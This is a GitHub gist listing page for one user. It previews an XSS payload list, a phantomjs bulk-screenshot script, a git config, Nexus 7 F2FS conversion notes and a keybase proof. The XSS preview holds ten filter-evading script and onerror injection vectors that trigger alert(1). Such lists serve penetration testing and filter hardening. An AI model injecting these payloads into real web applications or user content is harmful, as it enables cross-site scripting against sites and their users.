Skip to content

Instantly share code, notes, and snippets.

@bbarao
bbarao / 666_lines_of_XSS_vectors.html
Created Aug 24, 2017 — forked from JohannesHoppe/666_lines_of_XSS_vectors.html
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
View 666_lines_of_XSS_vectors.html
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
@bbarao
bbarao / run.sh
Created Jan 13, 2016
Phantom.js Bulk Screenshot
View run.sh
#!/bin/bash
for i in $(cat hosts); do
for s in http https; do
HOST=$s://$i
echo " > $HOST"
phantomjs --proxy=localhost:8080 --ssl-protocol=any --ignore-ssl-errors=true screenshot.js "$HOST"
done
done
@bbarao
bbarao / .gitconfig
Created Oct 15, 2015
My Git Config
View .gitconfig
[user]
name = YOURNAME
email = YOUR@EMAIL.xx
[core]
pager = less -FRSX
editor = /usr/bin/vim
[color]
diff = auto
status = auto
branch = auto
@bbarao
bbarao / Nexus7_F2FS
Last active Aug 29, 2015
Conversão Nexus 7 2012 (Wifi) para F2FS
View Nexus7_F2FS
Assumptions:
- Stock Rom (5.0) Instalada
- Android Tools (adb, fastboot) instaladas
- Bootloader Desbloqueado
TWRP:
http://techerrata.com/file/twrp2/grouper/openrecovery-twrp-2.8.2.0-grouper.img
Kernel:
View keybase.md

Keybase proof

I hereby claim:

  • I am bbarao on github.
  • I am barao (https://keybase.io/barao) on keybase.
  • I have a public key ASC2ecj0xmahoZiNH63U1NdDeHmxQsrxDrKsJqz7R9X4zQo

To claim this, I am signing this object: